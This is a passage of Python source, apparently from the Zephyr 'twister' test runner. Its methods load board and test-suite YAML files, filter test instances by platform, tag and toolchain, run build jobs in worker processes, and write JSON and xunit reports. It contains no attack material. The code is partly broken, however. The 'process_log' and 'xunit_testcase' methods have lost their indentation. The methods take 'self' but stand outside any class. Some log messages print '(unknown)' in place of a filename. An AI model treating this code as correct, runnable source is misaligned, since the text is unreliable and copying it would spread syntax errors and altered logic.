    logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{built_only}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, platform_reports):
    """Write the json and xunit report files for this run.

    @param name Base report name; defaults to "twister" when falsy.
    @param suffix Optional suffix appended to the report file name.
    @param report_dir Output directory; defaults to self.outdir.
    @param no_update When True, skip (re)writing the reports.
    @param platform_reports When True, also write one xml per platform.
    """
    if not self.instances:
        return
    logger.info("Saving reports...")
    if name:
        report_name = name
    else:
        report_name = "twister"
    if report_dir:
        os.makedirs(report_dir, exist_ok=True)
        filename = os.path.join(report_dir, report_name)
        outdir = report_dir
    else:
        filename = os.path.join(self.outdir, report_name)
        outdir = self.outdir
    if suffix:
        filename = "{}_{}".format(filename, suffix)
    if not no_update:
        # The json report is written first and feeds the xunit generators.
        json_file = filename + ".json"
        self.json_report(json_file, version=self.version)
        self.xunit_report(json_file, filename + ".xml", full_report=False)
        self.xunit_report(json_file, filename + "_report.xml", full_report=True)
        self.xunit_report_suites(json_file, filename + "_suite_report.xml")
        if platform_reports:
            self.target_report(json_file, outdir, suffix)
def target_report(self, json_file, outdir, suffix):
    """Write one per-platform xunit report for every platform present in
    the current set of instances."""
    platform_names = {instance.platform.name for instance in self.instances.values()}
    for platform_name in platform_names:
        if suffix:
            report_path = os.path.join(outdir, f"{platform_name}_{suffix}.xml")
        else:
            report_path = os.path.join(outdir, f"{platform_name}.xml")
        self.xunit_report(json_file, report_path, platform_name, full_report=True)
def add_configurations(self):
    """Discover platform definitions (board YAML files) under every board root.

    Populates ``self.platforms``, ``self.default_platforms`` and
    ``self.platform_names``; counts unloadable files in ``self.load_errors``.
    """
    for root in self.board_roots:
        root = os.path.abspath(root)
        logger.debug("Reading platform configuration files under %s..." %
                     root)
        for yaml_path in glob.glob(os.path.join(root, "*", "*", "*.yaml")):
            try:
                plat = Platform()
                plat.load(yaml_path)
                # A platform identifier must be unique across all roots;
                # a duplicate raises (not caught below, which only
                # handles RuntimeError from loading).
                if any(known.name == plat.name for known in self.platforms):
                    logger.error(f"Duplicate platform {plat.name} in {yaml_path}")
                    raise Exception(f"Duplicate platform identifier {plat.name} found")
                if plat.twister:
                    self.platforms.append(plat)
                    if plat.default:
                        self.default_platforms.append(plat.name)
            except RuntimeError as err:
                logger.error("E: %s: can't load: %s" % (yaml_path, err))
                self.load_errors += 1
    self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
    """Return every test case from all loaded test suites, in suite order."""
    return [case for ts in self.testsuites.values() for case in ts.testcases]
@staticmethod
def get_toolchain():
    """Resolve ZEPHYR_TOOLCHAIN_VARIANT via the verify-toolchain cmake script.

    Exits the process (code 2) when the script reports a failure.
    """
    script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
    result = CMake.run_cmake_script([script, "FORMAT=json"])

    try:
        if result['returncode']:
            raise TwisterRuntimeError(f"E: {result['returnmsg']}")
    except Exception as err:
        print(str(err))
        sys.exit(2)

    variant = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
    logger.info(f"Using '{variant}' toolchain.")

    return variant
def add_testsuites(self, testsuite_filter=None):
    """Discover and register test suites under every test root.

    Walks each root for sample/testsuite YAML files, parses every
    scenario they define and stores the resulting TestSuite objects in
    ``self.testsuites``. Files that fail to parse are logged and counted
    in ``self.load_errors``.

    @param testsuite_filter optional list of suite names; when non-empty,
           only suites whose name is in the list are registered.
    @return number of registered test suites.
    """
    # Fix: the default used to be a mutable list literal ([]), which is
    # shared across calls; use the None sentinel instead.
    if testsuite_filter is None:
        testsuite_filter = []
    for root in self.roots:
        root = os.path.abspath(root)

        logger.debug("Reading test case configuration files under %s..." % root)

        for dirpath, _, filenames in os.walk(root, topdown=True):
            if self.SAMPLE_FILENAME in filenames:
                filename = self.SAMPLE_FILENAME
            elif self.TESTSUITE_FILENAME in filenames:
                filename = self.TESTSUITE_FILENAME
            else:
                continue

            logger.debug("Found possible test case in " + dirpath)

            ts_path = os.path.join(dirpath, filename)

            try:
                parsed_data = TwisterConfigParser(ts_path, self.ts_schema)
                parsed_data.load()

                ts_path = os.path.dirname(ts_path)
                workdir = os.path.relpath(ts_path, root)

                # One YAML file may define several scenarios; each becomes
                # its own TestSuite.
                for name in parsed_data.tests.keys():
                    ts = TestSuite(root, workdir, name)

                    ts_dict = parsed_data.get_test(name, self.testsuite_valid_keys)

                    ts.source_dir = ts_path
                    ts.yamlfile = ts_path

                    ts.type = ts_dict["type"]
                    ts.tags = ts_dict["tags"]
                    ts.extra_args = ts_dict["extra_args"]
                    ts.extra_configs = ts_dict["extra_configs"]
                    ts.arch_allow = ts_dict["arch_allow"]
                    ts.arch_exclude = ts_dict["arch_exclude"]
                    ts.skip = ts_dict["skip"]
                    ts.platform_exclude = ts_dict["platform_exclude"]
                    ts.platform_allow = ts_dict["platform_allow"]
                    ts.platform_type = ts_dict["platform_type"]
                    ts.toolchain_exclude = ts_dict["toolchain_exclude"]
                    ts.toolchain_allow = ts_dict["toolchain_allow"]
                    ts.ts_filter = ts_dict["filter"]
                    ts.timeout = ts_dict["timeout"]
                    ts.harness = ts_dict["harness"]
                    ts.harness_config = ts_dict["harness_config"]
                    # A console harness is useless without its config.
                    if ts.harness == 'console' and not ts.harness_config:
                        raise Exception('Harness config error: console harness defined without a configuration.')
                    ts.build_only = ts_dict["build_only"]
                    ts.build_on_all = ts_dict["build_on_all"]
                    ts.slow = ts_dict["slow"]
                    ts.min_ram = ts_dict["min_ram"]
                    ts.modules = ts_dict["modules"]
                    ts.depends_on = ts_dict["depends_on"]
                    ts.min_flash = ts_dict["min_flash"]
                    ts.extra_sections = ts_dict["extra_sections"]
                    ts.integration_platforms = ts_dict["integration_platforms"]
                    ts.seed = ts_dict["seed"]

                    testcases = ts_dict.get("testcases", [])
                    if testcases:
                        for tc in testcases:
                            ts.add_testcase(name=f"{name}.{tc}")
                    else:
                        # No explicit testcases: derive them from sources.
                        ts.parse_subcases(ts_path)

                    if testsuite_filter:
                        if ts.name and ts.name in testsuite_filter:
                            self.testsuites[ts.name] = ts
                    else:
                        self.testsuites[ts.name] = ts

            except Exception as e:
                logger.error("%s: can't load (skipping): %s" % (ts_path, e))
                self.load_errors += 1
    return len(self.testsuites)
def get_platform(self, name):
    """Return the loaded Platform whose name matches ``name``, or None."""
    return next((plat for plat in self.platforms if plat.name == name), None)
def load_quarantine(self, file):
    """
    Load the quarantine yaml file and populate ``self.quarantine`` with
    one entry per (platform, scenario) product: the key is
    "<platform>.<scenario>", the value the quarantine comment.
    A platform list of ["all"] expands to every known platform.
    """
    quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)

    for entry in quarantine_yaml:
        if entry['platforms'][0] == "all":
            platforms = self.platform_names
        else:
            platforms = entry['platforms']
        comment = entry.get('comment', "NA")
        # Populate the mapping directly instead of building intermediate
        # single-key dicts and flattening them; insertion order matches.
        for p in platforms:
            for s in entry['scenarios']:
                self.quarantine[".".join([p, s])] = comment
def load_from_file(self, file, filter_platform=None):
    """Recreate test instances from a previously written JSON test plan.

    @param file path of the JSON test plan.
    @param filter_platform optional list of platform names; when
           non-empty, suites built for other platforms are skipped.
    """
    # Fix: None sentinel instead of a mutable list literal default.
    if filter_platform is None:
        filter_platform = []
    with open(file, "r") as json_test_plan:
        jtp = json.load(json_test_plan)
        instance_list = []
        for ts in jtp.get("testsuites", []):
            logger.debug(f"loading {ts['name']}...")
            testsuite = ts["name"]

            platform = self.get_platform(ts["platform"])
            if filter_platform and platform.name not in filter_platform:
                continue
            instance = TestInstance(self.testsuites[testsuite], platform, self.outdir)
            if ts.get("run_id"):
                instance.run_id = ts.get("run_id")
            if self.device_testing:
                tfilter = 'runnable'
            else:
                tfilter = 'buildable'
            instance.run = instance.check_runnable(
                self.enable_slow,
                tfilter,
                self.fixtures
            )

            instance.metrics['handler_time'] = ts.get('execution_time', 0)
            instance.metrics['ram_size'] = ts.get("ram_size", 0)
            instance.metrics['rom_size'] = ts.get("rom_size", 0)

            status = ts.get('status', None)
            reason = ts.get("reason", "Unknown")
            if status in ["error", "failed"]:
                # Failed/errored runs are re-attempted: clear the status.
                instance.status = None
                instance.reason = None
            # test marked as passed (built only) but can run when
            # --test-only is used. Reset status to capture new results.
            elif status == 'passed' and instance.run and self.test_only:
                instance.status = None
                instance.reason = None
            else:
                instance.status = status
                instance.reason = reason

            for tc in ts.get('testcases', []):
                identifier = tc['identifier']
                tc_status = tc.get('status', None)
                tc_reason = None
                # we set reason only if status is valid, it might have been
                # reset above...
                if instance.status:
                    tc_reason = tc.get('reason')
                if tc_status:
                    case = instance.set_case_status_by_name(identifier, tc_status, tc_reason)
                    case.duration = tc.get('execution_time', 0)
                    if tc.get('log'):
                        case.output = tc.get('log')

            instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
            instance_list.append(instance)
        self.add_instances(instance_list)
def apply_filters(self, **kwargs):
    """Build the set of test instances to run by applying all filters.

    Creates one TestInstance per (testsuite, platform) pair in scope,
    records every filtered-out instance with its reason in
    ``self.discards``, and registers the surviving ones via
    ``add_instances``. Also fills ``self.selected_platforms`` and
    ``self.filtered_platforms``.

    Recognized kwargs (all optional): platform, exclude_platform,
    run_individual_tests, arch, tag, exclude_tag, all, runnable,
    force_toolchain, force_platform, emulation_only.
    """
    toolchain = self.get_toolchain()

    discards = {}
    platform_filter = kwargs.get('platform')
    exclude_platform = kwargs.get('exclude_platform', [])
    testsuite_filter = kwargs.get('run_individual_tests', [])
    arch_filter = kwargs.get('arch')
    tag_filter = kwargs.get('tag')
    exclude_tag = kwargs.get('exclude_tag')
    all_filter = kwargs.get('all')
    runnable = kwargs.get('runnable')
    force_toolchain = kwargs.get('force_toolchain')
    force_platform = kwargs.get('force_platform')
    emu_filter = kwargs.get('emulation_only')

    logger.debug("platform filter: " + str(platform_filter))
    logger.debug(" arch_filter: " + str(arch_filter))
    logger.debug(" tag_filter: " + str(tag_filter))
    logger.debug(" exclude_tag: " + str(exclude_tag))

    default_platforms = False
    emulation_platforms = False

    # Decide the platform selection mode; the three modes are mutually
    # exclusive and --all wins over an explicit --platform list.
    if all_filter:
        logger.info("Selecting all possible platforms per test case")
        # When --all used, any --platform arguments ignored
        platform_filter = []
    elif not platform_filter and not emu_filter:
        logger.info("Selecting default platforms per test case")
        default_platforms = True
    elif emu_filter:
        logger.info("Selecting emulation platforms per test case")
        emulation_platforms = True

    if platform_filter:
        self.verify_platforms_existence(platform_filter, f"platform_filter")
        platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
    elif emu_filter:
        platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
    elif arch_filter:
        platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
    elif default_platforms:
        platforms = list(filter(lambda p: p.default, self.platforms))
    else:
        platforms = self.platforms

    logger.info("Building initial testsuite list...")

    for ts_name, ts in self.testsuites.items():
        # Per-suite platform scope: build_on_all widens it to every
        # platform; integration mode narrows it to the suite's
        # integration_platforms.
        if ts.build_on_all and not platform_filter:
            platform_scope = self.platforms
        elif ts.integration_platforms and self.integration:
            self.verify_platforms_existence(
                ts.integration_platforms, f"{ts_name} - integration_platforms")
            platform_scope = list(filter(lambda item: item.name in ts.integration_platforms, \
                                         self.platforms))
        else:
            platform_scope = platforms

        integration = self.integration and ts.integration_platforms

        # If there isn't any overlap between the platform_allow list and the platform_scope
        # we set the scope to the platform_allow list
        if ts.platform_allow and not platform_filter and not integration:
            self.verify_platforms_existence(
                ts.platform_allow, f"{ts_name} - platform_allow")
            a = set(platform_scope)
            b = set(filter(lambda item: item.name in ts.platform_allow, self.platforms))
            c = a.intersection(b)
            if not c:
                platform_scope = list(filter(lambda item: item.name in ts.platform_allow, \
                                             self.platforms))

        # list of instances per testsuite, aka configurations.
        instance_list = []
        for plat in platform_scope:
            instance = TestInstance(ts, plat, self.outdir)
            if runnable:
                tfilter = 'runnable'
            else:
                tfilter = 'buildable'
            instance.run = instance.check_runnable(
                self.enable_slow,
                tfilter,
                self.fixtures
            )
            # A connected DUT providing the required fixture makes the
            # instance runnable even if check_runnable() said otherwise.
            if runnable and self.duts:
                for h in self.duts:
                    if h.platform == plat.name:
                        if ts.harness_config.get('fixture') in h.fixtures:
                            instance.run = True

            # Each check below records only the FIRST discard reason for
            # an instance (dict.get keeps an earlier entry).
            if not force_platform and plat.name in exclude_platform:
                discards[instance] = discards.get(instance, "Platform is excluded on command line.")

            if (plat.arch == "unit") != (ts.type == "unit"):
                # Discard silently
                continue

            if ts.modules and self.modules:
                if not set(ts.modules).issubset(set(self.modules)):
                    discards[instance] = discards.get(instance, f"one or more required module not available: {','.join(ts.modules)}")

            if runnable and not instance.run:
                discards[instance] = discards.get(instance, "Not runnable on device")

            if self.integration and ts.integration_platforms and plat.name not in ts.integration_platforms:
                discards[instance] = discards.get(instance, "Not part of integration platforms")

            if ts.skip:
                discards[instance] = discards.get(instance, "Skip filter")

            if tag_filter and not ts.tags.intersection(tag_filter):
                discards[instance] = discards.get(instance, "Command line testsuite tag filter")

            if exclude_tag and ts.tags.intersection(exclude_tag):
                discards[instance] = discards.get(instance, "Command line testsuite exclude filter")

            if testsuite_filter and ts_name not in testsuite_filter:
                discards[instance] = discards.get(instance, "TestSuite name filter")

            if arch_filter and plat.arch not in arch_filter:
                discards[instance] = discards.get(instance, "Command line testsuite arch filter")

            if not force_platform:
                if ts.arch_allow and plat.arch not in ts.arch_allow:
                    discards[instance] = discards.get(instance, "Not in test case arch allow list")
                if ts.arch_exclude and plat.arch in ts.arch_exclude:
                    discards[instance] = discards.get(instance, "In test case arch exclude")
                if ts.platform_exclude and plat.name in ts.platform_exclude:
                    discards[instance] = discards.get(instance, "In test case platform exclude")

            if ts.toolchain_exclude and toolchain in ts.toolchain_exclude:
                discards[instance] = discards.get(instance, "In test case toolchain exclude")

            if platform_filter and plat.name not in platform_filter:
                discards[instance] = discards.get(instance, "Command line platform filter")

            if ts.platform_allow and plat.name not in ts.platform_allow:
                discards[instance] = discards.get(instance, "Not in testsuite platform allow list")

            if ts.platform_type and plat.type not in ts.platform_type:
                discards[instance] = discards.get(instance, "Not in testsuite platform type list")

            if ts.toolchain_allow and toolchain not in ts.toolchain_allow:
                discards[instance] = discards.get(instance, "Not in testsuite toolchain allow list")

            if not plat.env_satisfied:
                discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))

            if not force_toolchain \
                    and toolchain and (toolchain not in plat.supported_toolchains) \
                    and "host" not in plat.supported_toolchains \
                    and ts.type != 'unit':
                discards[instance] = discards.get(instance, "Not supported by the toolchain")

            if plat.ram < ts.min_ram:
                discards[instance] = discards.get(instance, "Not enough RAM")

            if ts.depends_on:
                dep_intersection = ts.depends_on.intersection(set(plat.supported))
                if dep_intersection != set(ts.depends_on):
                    discards[instance] = discards.get(instance, "No hardware support")

            if plat.flash < ts.min_flash:
                discards[instance] = discards.get(instance, "Not enough FLASH")

            if set(plat.ignore_tags) & ts.tags:
                discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")

            if plat.only_tags and not set(plat.only_tags) & ts.tags:
                discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")

            test_configuration = ".".join([instance.platform.name,
                                           instance.testsuite.id])
            # skip quarantined tests
            if test_configuration in self.quarantine and not self.quarantine_verify:
                discards[instance] = discards.get(instance,
                                                  f"Quarantine: {self.quarantine[test_configuration]}")
            # run only quarantined test to verify their statuses (skip everything else)
            if self.quarantine_verify and test_configuration not in self.quarantine:
                discards[instance] = discards.get(instance, "Not under quarantine")

            # if nothing stopped us until now, it means this configuration
            # needs to be added.
            instance_list.append(instance)

        # no configurations, so jump to next testsuite
        if not instance_list:
            continue

        # if twister was launched with no platform options at all, we
        # take all default platforms
        if default_platforms and not ts.build_on_all and not integration:
            if ts.platform_allow:
                a = set(self.default_platforms)
                b = set(ts.platform_allow)
                c = a.intersection(b)
                if c:
                    aa = list(filter(lambda ts: ts.platform.name in c, instance_list))
                    self.add_instances(aa)
                else:
                    self.add_instances(instance_list)
            else:
                instances = list(filter(lambda ts: ts.platform.default, instance_list))
                self.add_instances(instances)
        elif integration:
            instances = list(filter(lambda item: item.platform.name in ts.integration_platforms, instance_list))
            self.add_instances(instances)
        elif emulation_platforms:
            self.add_instances(instance_list)
            for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
                discards[instance] = discards.get(instance, "Not an emulated platform")
        else:
            self.add_instances(instance_list)

    for _, case in self.instances.items():
        case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)

    self.discards = discards
    self.selected_platforms = set(p.platform.name for p in self.instances.values())

    remove_from_discards = []  # configurations to be removed from discards.
    for instance in self.discards:
        instance.reason = self.discards[instance]
        # If integration mode is on all skips on integration_platforms are treated as errors.
        if self.integration and instance.platform.name in instance.testsuite.integration_platforms \
                and "Quarantine" not in instance.reason:
            instance.status = "error"
            instance.reason += " but is one of the integration platforms"
            self.instances[instance.name] = instance
            # Such configuration has to be removed from discards to make sure it won't get skipped
            remove_from_discards.append(instance)
        else:
            instance.status = "filtered"

        instance.add_missing_testscases(instance.status)

    # Remove from discards configurations that must not be discarded
    # (e.g. integration_platforms when --integration was used)
    for instance in remove_from_discards:
        del self.discards[instance]

    self.filtered_platforms = set(p.platform.name for p in self.instances.values()
                                  if p.status != "skipped" )
def add_instances(self, instance_list):
    """Register each test instance in ``self.instances`` keyed by its name."""
    self.instances.update({inst.name: inst for inst in instance_list})
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False, retry_build_errors=False):
    """Queue a cmake/run task for every instance that still needs work.

    Instances that already passed, were skipped or filtered are never
    re-queued; build errors are retried only when requested.
    """
    skip_statuses = ['passed', 'skipped', 'filtered']
    if not retry_build_errors:
        skip_statuses.append("error")

    for instance in self.instances.values():
        if build_only:
            instance.run = False
        if instance.status in skip_statuses:
            continue
        logger.debug(f"adding {instance.name}")
        instance.status = None
        op = "run" if test_only and instance.run else "cmake"
        pipeline.put({"op": op, "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
    """Worker loop: drain the pipeline queue, processing one task at a time.

    Returns True once the queue is empty.
    """
    while True:
        try:
            task = pipeline.get_nowait()
        except queue.Empty:
            # Queue drained: this worker is finished.
            break
        test = task['test']
        builder = ProjectBuilder(
            self,
            test,
            lsan=self.enable_lsan,
            asan=self.enable_asan,
            ubsan=self.enable_ubsan,
            coverage=self.enable_coverage,
            extra_args=self.extra_args,
            device_testing=self.device_testing,
            cmake_only=self.cmake_only,
            cleanup=self.cleanup,
            valgrind=self.enable_valgrind,
            inline_logs=self.inline_logs,
            generator=self.generator,
            generator_cmd=self.generator_cmd,
            verbose=self.verbose,
            warnings_as_errors=self.warnings_as_errors,
            overflow_as_errors=self.overflow_as_errors,
            suite_name_check=self.suite_name_check,
            seed=self.seed
        )
        builder.process(pipeline, done_queue, task, lock, results)
    return True
def execute(self, pipeline, done, results):
    """Spawn ``self.jobs`` worker processes to build/run all queued jobs.

    Blocks until all workers finish; on Ctrl-C the workers are terminated.
    Returns the (shared) results object.
    """
    lock = Lock()
    logger.info("Adding tasks to the queue...")
    self.add_tasks_to_queue(pipeline, self.build_only, self.test_only,
                            retry_build_errors=self.retry_build_errors)
    logger.info("Added initial list of jobs to queue")

    workers = []
    for idx in range(self.jobs):
        logger.debug(f"Launch process {idx}")
        worker = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
        workers.append(worker)
        worker.start()

    try:
        for worker in workers:
            worker.join()
    except KeyboardInterrupt:
        logger.info("Execution interrupted")
        for worker in workers:
            worker.terminate()

    return results
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
@staticmethod
def xunit_testcase(eleTestsuite, name, classname, status, ts_status, reason, duration, runnable, stats, log, build_only_as_skip):
fails, passes, errors, skips = stats
if status in ['skipped', 'filtered']:
duration = 0
eleTestcase = ET.SubElement(
eleTestsuite, "testcase",
classname=classname,
name=f"{name}",
time=f"{duration}")
if status in ['skipped', 'filtered']:
skips += 1
# temporarily add build_only_as_skip to restore existing CI report behaviour
if ts_status == "passed" and not runnable:
tc_type = "build"
else:
tc_type = status
ET.SubElement(eleTestcase, 'skipped', type=f"{tc_type}", message=f"{reason}")
elif status in ["failed", "blocked"]:
fails += 1
el = ET.SubElement(eleTestcase, 'failure', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == "error":
errors += 1
el = ET.SubElement(eleTestcase, 'error', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == 'passed':
if not runnable and build_only_as_skip:
ET.SubElement(eleTestcase, 'skipped', type="build", message="built only")
skips += 1
else:
passes += 1
else:
if not status:
logger.debug(f"{name}: No status")
ET.SubElement(eleTestcase, 'skipped', type=f"untested", message="No results captured, testsuite misconfiguration?")
else:
logger.error(f"{name}: Unknown status '{status}'")
return (fails, passes, errors, skips)
# Generate a report with all testsuites instead of doing this per platform
def xunit_report_suites(self, json_file, filename):
    """Write an xunit XML file with one <testsuite> element per suite.

    Results are read back from the JSON report at ``json_file``; the XML
    tree is written to ``filename``.
    """
    json_data = {}
    with open(json_file, "r") as json_results:
        json_data = json.load(json_results)

    env = json_data.get('environment', {})
    version = env.get('zephyr_version', None)

    eleTestsuites = ET.Element('testsuites')
    all_suites = json_data.get("testsuites", [])
    suites_to_report = all_suites
    # do not create entry if everything is filtered out
    if not self.detailed_skipped_report:
        suites_to_report = list(filter(lambda d: d.get('status') != "filtered", all_suites))

    for suite in suites_to_report:
        duration = 0
        # Counter attributes start at "0" and are patched below once the
        # real totals are known.
        eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
                                     name=suite.get("name"), time="0",
                                     timestamp = self.timestamp,
                                     tests="0",
                                     failures="0",
                                     errors="0", skipped="0")
        eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
        # Multiple 'property' can be added to 'properties'
        # differing by name and value
        ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
        ET.SubElement(eleTSPropetries, 'property', name="platform", value=suite.get("platform"))
        ET.SubElement(eleTSPropetries, 'property', name="architecture", value=suite.get("arch"))

        total = 0
        fails = passes = errors = skips = 0
        handler_time = suite.get('execution_time', 0)
        runnable = suite.get('runnable', 0)
        duration += float(handler_time)
        ts_status = suite.get('status')
        for tc in suite.get("testcases", []):
            status = tc.get('status')
            # Fall back to the suite-level reason/log when the case has none.
            reason = tc.get('reason', suite.get('reason', 'Unknown'))
            log = tc.get("log", suite.get("log"))

            tc_duration = tc.get('execution_time', handler_time)
            name = tc.get("identifier")
            classname = ".".join(name.split(".")[:2])
            fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
                name, classname, status, ts_status, reason, tc_duration, runnable,
                (fails, passes, errors, skips), log, True)

        total = (errors + passes + fails + skips)

        eleTestsuite.attrib['time'] = f"{duration}"
        eleTestsuite.attrib['failures'] = f"{fails}"
        eleTestsuite.attrib['errors'] = f"{errors}"
        eleTestsuite.attrib['skipped'] = f"{skips}"
        eleTestsuite.attrib['tests'] = f"{total}"

    result = ET.tostring(eleTestsuites)
    with open(filename, 'wb') as report:
        report.write(result)
def xunit_report(self, json_file, filename, selected_platform=None, full_report=False):
    """Write an xunit XML file with one <testsuite> element per platform.

    Results are read back from the JSON report at ``json_file``. When
    ``selected_platform`` is given, only that platform is reported;
    otherwise all of ``self.selected_platforms``. With ``full_report``
    each test case becomes its own <testcase>; otherwise one entry per
    suite is emitted.
    """
    if selected_platform:
        selected = [selected_platform]
        logger.info(f"Writing target report for {selected_platform}...")
    else:
        logger.info(f"Writing xunit report (unknown)...")
        selected = self.selected_platforms

    json_data = {}
    with open(json_file, "r") as json_results:
        json_data = json.load(json_results)

    env = json_data.get('environment', {})
    version = env.get('zephyr_version', None)

    eleTestsuites = ET.Element('testsuites')
    all_suites = json_data.get("testsuites", [])

    for platform in selected:
        suites = list(filter(lambda d: d['platform'] == platform, all_suites))
        # do not create entry if everything is filtered out
        if not self.detailed_skipped_report:
            non_filtered = list(filter(lambda d: d.get('status') != "filtered", suites))
            if not non_filtered:
                continue

        duration = 0
        # Counter attributes start at "0" and are patched below once the
        # real totals are known.
        eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
                                     name=platform,
                                     timestamp = self.timestamp,
                                     time="0",
                                     tests="0",
                                     failures="0",
                                     errors="0", skipped="0")
        eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
        # Multiple 'property' can be added to 'properties'
        # differing by name and value
        ET.SubElement(eleTSPropetries, 'property', name="version", value=version)

        total = 0
        fails = passes = errors = skips = 0
        for ts in suites:
            handler_time = ts.get('execution_time', 0)
            runnable = ts.get('runnable', 0)
            duration += float(handler_time)

            ts_status = ts.get('status')
            # Do not report filtered testcases
            if ts_status == 'filtered' and not self.detailed_skipped_report:
                continue
            if full_report:
                for tc in ts.get("testcases", []):
                    status = tc.get('status')
                    # Fall back to suite-level reason/log when the case has none.
                    reason = tc.get('reason', ts.get('reason', 'Unknown'))
                    log = tc.get("log", ts.get("log"))

                    tc_duration = tc.get('execution_time', handler_time)
                    name = tc.get("identifier")
                    classname = ".".join(name.split(".")[:2])
                    fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
                        name, classname, status, ts_status, reason, tc_duration, runnable,
                        (fails, passes, errors, skips), log, True)
            else:
                reason = ts.get('reason', 'Unknown')
                name = ts.get("name")
                classname = f"{platform}:{name}"
                log = ts.get("log")
                fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
                    name, classname, ts_status, ts_status, reason, duration, runnable,
                    (fails, passes, errors, skips), log, False)

        total = (errors + passes + fails + skips)

        eleTestsuite.attrib['time'] = f"{duration}"
        eleTestsuite.attrib['failures'] = f"{fails}"
        eleTestsuite.attrib['errors'] = f"{errors}"
        eleTestsuite.attrib['skipped'] = f"{skips}"
        eleTestsuite.attrib['tests'] = f"{total}"

    result = ET.tostring(eleTestsuites)
    with open(filename, 'wb') as report:
        report.write(result)
def json_report(self, filename, version="NA"):
    """Serialize all test instances and their results into a JSON report.

    @param filename output path of the JSON file.
    @param version zephyr version string recorded in the environment block.
    """
    logger.info(f"Writing JSON report (unknown)")
    report = {}
    report["environment"] = {"os": os.name,
                             "zephyr_version": version,
                             "toolchain": self.get_toolchain()
                             }
    suites = []
    for instance in self.instances.values():
        suite = {}
        handler_log = os.path.join(instance.build_dir, "handler.log")
        build_log = os.path.join(instance.build_dir, "build.log")
        device_log = os.path.join(instance.build_dir, "device.log")

        handler_time = instance.metrics.get('handler_time', 0)
        ram_size = instance.metrics.get ("ram_size", 0)
        rom_size = instance.metrics.get("rom_size",0)
        suite = {
            "name": instance.testsuite.name,
            "arch": instance.platform.arch,
            "platform": instance.platform.name,
        }
        if instance.run_id:
            suite['run_id'] = instance.run_id

        suite["runnable"] = False
        if instance.status != 'filtered':
            suite["runnable"] = instance.run

        if ram_size:
            suite["ram_size"] = ram_size
        if rom_size:
            suite["rom_size"] = rom_size

        if instance.status in ["error", "failed"]:
            suite['status'] = instance.status
            suite["reason"] = instance.reason
            # FIXME
            # Prefer the handler log, then the device log, falling back
            # to the build log.
            if os.path.exists(handler_log):
                suite["log"] = self.process_log(handler_log)
            elif os.path.exists(device_log):
                suite["log"] = self.process_log(device_log)
            else:
                suite["log"] = self.process_log(build_log)
        elif instance.status == 'filtered':
            suite["status"] = "filtered"
            suite["reason"] = instance.reason
        elif instance.status == 'passed':
            suite["status"] = "passed"
        elif instance.status == 'skipped':
            suite["status"] = "skipped"
            suite["reason"] = instance.reason

        if instance.status is not None:
            suite["execution_time"] = f"{float(handler_time):.2f}"

        testcases = []

        # With a single test case the whole handler time is attributed
        # to it; otherwise per-case durations are used.
        if len(instance.testcases) == 1:
            single_case_duration = f"{float(handler_time):.2f}"
        else:
            single_case_duration = 0

        for case in instance.testcases:
            testcase = {}
            testcase['identifier'] = case.name
            if instance.status:
                if single_case_duration:
                    testcase['execution_time'] = single_case_duration
                else:
                    testcase['execution_time'] = f"{float(case.duration):.2f}"

            if case.output != "":
                testcase['log'] = case.output

            if case.status == "skipped":
                if instance.status == "filtered":
                    testcase["status"] = "filtered"
                else:
                    testcase["status"] = "skipped"
                    testcase["reason"] = case.reason or instance.reason
            else:
                testcase["status"] = case.status
                if case.reason:
                    testcase["reason"] = case.reason

            testcases.append(testcase)

        suite['testcases'] = testcases
        suites.append(suite)

    report["testsuites"] = suites
    with open(filename, "wt") as json_file:
        json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testsuite(self, identifier):
    """Return the test suites containing a test case named ``identifier``.

    A suite appears once per matching case, mirroring the historical
    append-per-case behaviour.
    """
    matches = []
    for ts in self.testsuites.values():
        matches += [ts for case in ts.testcases if case == identifier]
    return matches
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
    """
    Verify if platform name (passed by --platform option, or in yaml file
    as platform_allow or integration_platforms options) is correct. If not -
    log and raise error.
    """
    # Fix: the previous for/else implementation broke out of the loop at
    # the FIRST recognized platform, leaving the remaining names
    # unchecked, and only reported an error when no name matched at all.
    # Validate every name instead, as the docstring promises.
    for platform in platform_names_to_verify:
        if platform not in self.platform_names:
            logger.error(f"{log_info} - unrecognized platform - {platform}")
            sys.exit(2)
def create_build_dir_links(self):
    """
    Iterate through all no-skipped instances in suite and create links
    for each one build directories. Those links will be passed in the next
    steps to the CMake command.
    """
    links_dir_path = os.path.join(self.outdir, "twister_links")
    if not os.path.exists(links_dir_path):
        os.mkdir(links_dir_path)

